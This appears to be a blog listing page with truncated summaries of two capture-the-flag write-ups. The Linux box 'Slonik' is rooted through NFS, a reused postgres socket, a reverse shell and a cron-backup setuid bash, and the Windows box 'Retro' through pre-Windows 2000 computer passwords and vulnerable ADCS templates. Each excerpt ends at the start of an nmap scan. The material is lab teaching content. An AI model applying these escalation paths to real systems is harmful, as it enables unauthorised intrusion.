SidePieceVillage

Slonik is a linux box created around reusing a socket and the ability to port forward them. It starts with a box running NFS, and using showmount our able to see two. There is /var/backups, and /home. Home was interesting, with there being a .bash_history and a .psql_history to see that we have commands previously ran. Using rpcinfo you can see we have sockets being used. From the information we have we can create a directory /tmp/sock and us it and the ending pid in the .bash_history. Using ssh we can connect using the socket created by postgres. Once connected we can get a reverse shell using a POC from hacktricks. Once getting a shell, we run pspy64 to see a script running from cron /usr/bin/backup. This script will back up everything postgres HOME directory. By copying /usr/bin/bash to our HOME directory in main. Then giving it the sticky bit and making it executable we can get root. Initial Nmap1234PORT STATE SERVICE REASON22/tcp open ssh syn-ack ttl 63111/tcp ...

Retro is a Easy Windows box working around pre-created windows 2000 machines. Pre-creating a computer means adding a computer to AD without using it to join a host to the domain right away, it just gets used later. There is a “Pre-Windows 2000” compatibility option that can be selected when creating a computer from ADUC, still present in Windows Server 2022. A computer created with this option will have a password equal to the computers name in lowercase without the ‘$’. This allows you to look at ADCS templates being used that are vulnerable, which leads to privilege escalation to Administrator. Resource from Medium Initial Nmap123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293# Nmap 7.94SVN scan initiated Wed Nov 6 22:09:30 2024 as: /usr/lib/nmap/nmap -v -sVC -oN Evidence/Scans/initial.log 10.10.111.122Nmap scan report for 10.10.111.122Host is up (0.17s...